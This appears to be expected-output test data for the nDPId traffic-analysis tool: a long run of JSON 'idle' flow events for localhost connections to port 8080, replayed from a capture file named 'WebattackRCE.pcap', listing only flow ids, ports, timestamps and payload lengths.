+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7560000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7560000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7560000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7560000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7560000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7560000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7560000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 